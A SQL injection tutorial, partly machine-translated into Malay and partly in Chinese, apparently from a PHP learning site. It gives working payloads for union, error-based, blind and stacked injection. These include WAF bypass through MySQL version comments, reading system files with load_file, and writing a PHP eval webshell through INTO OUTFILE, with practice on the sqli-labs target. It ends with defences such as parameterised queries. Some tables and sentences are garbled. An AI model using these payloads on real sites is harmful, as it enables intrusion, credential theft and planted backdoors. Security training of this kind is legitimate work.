Artikel ini memberi anda pengetahuan tentang suntikan SQL adalah tingkah laku yang mana pelayan tidak mengesahkan data yang dihantar oleh pelanggan dengan ketat, menyebabkan pernyataan SQL pelayan diubah suai secara berniat jahat dan saya harap ia akan berlaku berguna kepada semua orang.
Bahasa Pertanyaan Berstruktur (SQL) ialah bahasa pengaturcaraan khas yang digunakan untuk pertanyaan data standard dalam pangkalan data. Pada Oktober 1986, American National Standards Institute menyeragamkan SQL dan menggunakannya sebagai bahasa standard untuk sistem pangkalan data hubungan. Pada tahun 1987, ia mendapat sokongan daripada Pertubuhan Piawaian Antarabangsa dan menjadi piawaian antarabangsa.
SQL injection ialah tingkah laku di mana pelayan tidak mengesahkan data yang dihantar oleh klien dengan ketat, menyebabkan pernyataan SQL pelayan diubah suai secara berniat jahat dan berjaya dilaksanakan
Tingkah laku serangan suntikan SQL boleh digambarkan sebagai menyuntik sintaks SQL ke dalam parameter yang boleh dikawal pengguna, memusnahkan struktur SQL asal dan mencapai hasil yang tidak dijangka apabila menulis program Tingkah laku serangan yang terhasil. Punca boleh dikaitkan dengan superposisi dua sebab berikut.
Menurut prinsip kelemahan suntikan SQL, pengguna menyuntik SQL ke dalam "parameter boleh dikawal" Dalam erti kata lain, di mana aplikasi Web memperoleh input pengguna, selagi ia dibawa ke dalam pertanyaan pangkalan data, terdapat kemungkinan suntikan SQL ini biasanya termasuk:
Kaedah penyerahan termasuk: dapatkan, hantar, kuki, permintaan, dll.
Antara mereka: permintaan mempunyai sokongan yang baik, anda meletakkan parameter dalam kaedah dapatkan, kaedah pos, kaedah kuki Penyerahan mungkin
akan cuba menyerahkan data pada yang disyaki titik suntikan atau selepas parameter untuk menentukan sama ada terdapat kelemahan suntikan SQL.
Data ujian | Ujian pertimbangan | Idea serangan | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
-1 atau 1 | Sama ada halaman sebelumnya atau seterusnya boleh digemakan (untuk menentukan sama ada terdapat gema) | Suntikan bersama td> | |||||||||||||||||||||
' atau "
|
Sama ada mesej ralat pangkalan data dipaparkan; sama ada halaman yang digemakan adalah berbeza (Jenis aksara atau angka) | Ralat suntikan | |||||||||||||||||||||
dan 1=1 atau dan 1=2 | Halaman bergema Sama ada halaman tersebut berbeza (tentukan sama ada halaman mempunyai status jenis Boolean) | Suntikan buta Boolean | |||||||||||||||||||||
dan tidur(5) | Tentukan Masa pemulangan halaman | Suntikan tertunda | |||||||||||||||||||||
Meloloskan diri dari penghakiman |
|
||||||||||||||||||||||
Nota: Jika 404 muncul atau halaman melompat apabila anda menguji tapak web, ini bermakna tapak web dilindungi
Seperti yang ditunjukkan di bawah, secara amnya Katakan, parameter seperti id diikuti oleh jenis angka (mungkin juga jenis aksara), dan parameter lain diikuti oleh jenis aksara
Jika beberapa rentetan benar-benar terhad , kami boleh mencuba beberapa pintasan pengekodan.
Contohnya, pengekodan URLEncode, ASCII, HEX dan pengekodan unikod dipintas:
/*!...*/
ditambah selepas pembukaan /*, maka pernyataan dalam ulasan ini akan dilaksanakan. /*!50001sleep(3)*/
50001 di sini bermakna pernyataan ini hanya akan dilaksanakan jika pangkalan data adalah versi 5.00.01 atau lebih tinggi. Kami boleh memintas beberapa WAF dengan cara ini. /*!50001 select * from test */;
inurl:phpinfo.php
Prasyarat untuk penggunaan:
, yang mana parameter digunakan dalam versi yang lebih tinggi. mysql Operasi import dan eksport fail dihadkan dalam pangkalan data. Untuk mengkonfigurasi parameter ini, anda perlu mengubah suai fail konfigurasi my.ini dan mulakan semula perkhidmatan mysql [Lalainya ialah NULL dalam Phpstudy, yang tidak membenarkan membaca dan menulis fail] secure_file_priv
修改配置文件,对读写不做限制,文件路径C:\phpStudy\MySQL\my.ini
,该操作比较敏感,需要在mysql的配置文件中操作,在phpmyadmin网页中不能修改
?id=-1'union select 1,current_user(),3 --+
?id=-1' union select 1,File_priv,3 from mysql.user where user="root" and host="localhost"--+
方法2:
select File_priv from mysql.user where user="root" and host="localhost";
下面两种方法一样
?id=1' and 1=2 union select 1,load_file('c:\\windows\\system32\\drivers\\etc\\hosts'),3 --+ ?id=1' and 1=2 union select 1,load_file('c:/windows/system32/drivers/etc/hosts'),3 --+
这里需要注意,写16进制是直接写,写明文的话,需要用引号给包住
写phpinfo,没有报错就说明写入成功,可以直接访问写入的文件地址
# 1. 直接写 ?id=-1' union select 1,'<?php phpinfo();?>',3 into outfile 'c:\\phpstudy\\www\\hack.php'--+ # 2. 改写成16进制 ?id=1' and 1=2 union select 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile 'c:/phpstudy/www/hack.php' --+
写一句话木马
# 1. 直接写 ?id=1' and 1=2 union select 1,'=@eval($_REQUEST[404])?>',3 into outfile 'c:/phpstudy/www/hack1.php' --+ # 2. 改写成16进制 ?id=1' and 1=2 union select 1,0x3c3f3d406576616c28245f524551554553545b3430345d293f3e,3 into outfile 'c:/phpstudy/www/hack1.php' --+
在进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入,提前了解或预知其SQL语句的大概写法也能更好的选择对应的注入语句。
更详细的介绍,请参见下一篇文章 《SQL注入的常见方式》
重点理解:我们可以通过下面的查询方式和网站应用的关系、注入点产生地方、应用猜测到对方的SQL查询方式
查询方法举例说明
举例:select * from news where id=$id
举例:insert into news(id,url,text) values(2,'x','$t')
举例:delete from news where id=$id
举例:update user set pwd='$p' where id=2 and username='admin'
举例:select * from news order by $id
举例:select id,name,price from news order by $order
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试。
这个过程称之为盲注。我们可以知道盲注分为以下三类:
基于布尔的SQL盲注-逻辑判断(不回显)
regexp,like,ascii,left,ord,mid
基于时间的SQ盲注-延时判断(不回显)
if,sleep
基于报错的SQL盲注-(强制)报错回显
floor,updatexml,extractvalue
报错模板:https://www.jianshu.com/p/bc35f8dd4f7c
利用的就是mysql函数参数格式错误进行报错注入。
updatexml()函数语法:updatexml(XML_document,Xpath_string,new_value);
适用版本是:5.1.5+
利用方式:在执行两个函数时,如果出现xml文件路径错误,就会产生报错 那么我们就需要构造Xpath_string格式错误,也就是我们将Xpath_string的值传递成不符合格式的参数,mysql就会报错
利用的原理是xpath格式不符报错注入。
函数语法:extractvalue(XML_document,XPath_string)
适用的版本:5.1.5+
1. 获取当前是数据库名称及使用mysql数据库的版本信息: and extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) 2. 获取当前注入点的用户权限信息及操作系统版本信息: and extractvalue(1,concat(0x7e,@@version_compile_os,0x7e,user(),0x7e)) 3. 获取当前位置所用数据库的位置: and extractvalue(1,concat(0x7e,@@datadir,0x7e)) 4. 获取数据表信息: and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) 5. 获取users数据表的列名信息: and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e)) 6. 获取对应的列名的信息(username\password): and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))
二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。
二次注入的原理:在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes
或者是借助 get_magic_quotes_gpc
对其中的特殊字符进行了转义,但是addslashes
有一个特点就是虽然参数在过滤后会添加\
进行转义,但是\
并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。
第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容
这里使用的是sql-libs靶场的第24关
注册了一个新用户之后的数据库如下
新用户登录,并重置密码
查看数据库,有意思的事情发生了,dhakkan的密码改变了,但是新用户的密码没有改变
Bertindan suntikan (Suntikan bertindan), seperti yang anda boleh lihat dari makna kata nama, ia harus menjadi sekumpulan pernyataan SQL (berbilang) dilaksanakan bersama. Ini juga berlaku dalam aplikasi sebenar Kita tahu bahawa dalam mysql, terutamanya dalam baris arahan, ;
ditambahkan pada akhir setiap pernyataan untuk menunjukkan penghujung pernyataan. Dengan cara ini, kami memikirkan sama ada kami boleh menggunakan berbilang ayat bersama-sama. Jadi suntikan tindanan (juga dipanggil pertanyaan tindanan) muncul
Nota:
Syarat penggunaan suntikan tindanan adalah sangat terhad, dan ia mungkin dihadkan oleh API atau enjin pangkalan data, atau kebenaran . Ia hanya boleh digunakan apabila fungsi pangkalan data dipanggil untuk menyokong pelaksanaan berbilang penyata SQL Fungsi mysqli_multi_query() menyokong pelaksanaan serentak berbilang penyataan SQL, seperti PHP, untuk menghalang Mekanisme suntikan SQL, fungsi yang memanggil pangkalan data sering digunakan Fungsi mysqli_query() hanya boleh melaksanakan satu pernyataan, dan kandungan selepas titik koma tidak akan dilaksanakan sangat terhad. Apabila ia boleh digunakan, ia boleh menyebabkan ancaman besar kepada tapak web
DNSlog ialah maklumat nama domain yang disimpan pada Pelayan DNS. Ia merekodkan maklumat akses pengguna nama domain www.baidu.com, dsb., serupa dengan fail log. Untuk lebih banyak operasi, lihat Analisis Ringkas Kemahiran Praktikal DNSlog dalam Ujian Penembusan
Lima pangkalan data MySQL, SQLServer, Oracle, PostgreSQL dan Access sepatutnya menjadi pangkalan data paling popular di pasaran pada masa ini. Apabila kami menjalankan ujian penembusan, ini adalah jenis pangkalan data yang paling kami hadapi. Artikel ini membuat statistik tentang persamaan dan perbezaan antara jenis pangkalan data ini semasa suntikan.
|
MySQL | SQLServer | Oracle | PostgreSQL | Akses | ||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Ulasan baris tunggal td > | # |
-- |
-- |
Tiada | |||||||||||||||||||||||||
Ulasan berbilang baris | /** / |
/**/ |
/** |
Tiada | |||||||||||||||||||||||||
Port pangkalan data | 3306 | 1433 | 1521 | 5432 | Ia ialah pangkalan data fail, jadi tiada nombor port diperlukan |
减减空格 | "-- " | "–%20" | “–+” |
---|---|---|---|
# | “#” | "%23" | |
内联注释 | /* 被注释掉的内容 */ | ||
数据库中,符号.
代表下一级,如dvwa.user表示dvwa数据库下的user表
推荐阅读:SQL注入必备知识初级
1:mysql -uroot -proot登录数据库
2:show databases; 查看有哪些数据库
3:use informatin_schema; 使用某数据库
4:limit的用法
5:select 函数名; 查询某内容
函数名有以下:
防御SQL注入的核心思想是对用户输入的数据进行严格的检查,并且对数据库的使用采用最小权限分配原则。目前SQL注入的防御手段有以下几种:
强迫使用参数化语句。参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。采用这种措施,可以杜绝大部分的SQL注入式攻击
例如Mybatis中使用#
可以防止SQL注入,$
并不能防止SQL注入
thinkphp使用数组方式将自动使用框架自带的字段类型检测防止注入、PDO驱动参数绑定、预处理等
Thinkphp框架的安全写法 安全的替换写法 $data=M('Member')->where(array('id'=>$_GET['id']))->find();//使用数组方式将自动使用框架自带的字段类型检测防止注入 $data=M('Member')->where(array('id'=>(int)$_GET['id']))->find();//类型约束 $data=M('Member')->where('id='.intval($_GET['id']))->find();//类型转换 $data=M('Member')->where(array('id'=>I('get.id','','intval')))->find();//$data=M('Member')- >where(array('id'=>':id'))->bind(':id',I('get.id'))->select();//PDO驱动可以使用参数绑定 $data=M('Member')->where("id=%d",array($_GET['id']))->find();//预处理机制 //不安全的写法举例 $_GET['id']=8;//希望得到的是正整数 $data=M()->query('SELECT * FROM `member` WHERE id='.$_GET['id']);//执行的SQL语句 $_GET['id']='8 UNION SELECT * FROM `member`';;//隐患:构造畸形语句进行注入;
主要包括:
例如,避免网站显示SQL执行出错信息,防止攻击者使用基于错误的方式进行注入;每个数据层编码统一,防止过滤模型被绕过等。使用WAF。
相关推荐:《mysql教程》
Atas ialah kandungan terperinci Membawa anda memahami suntikan SQL (butiran). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!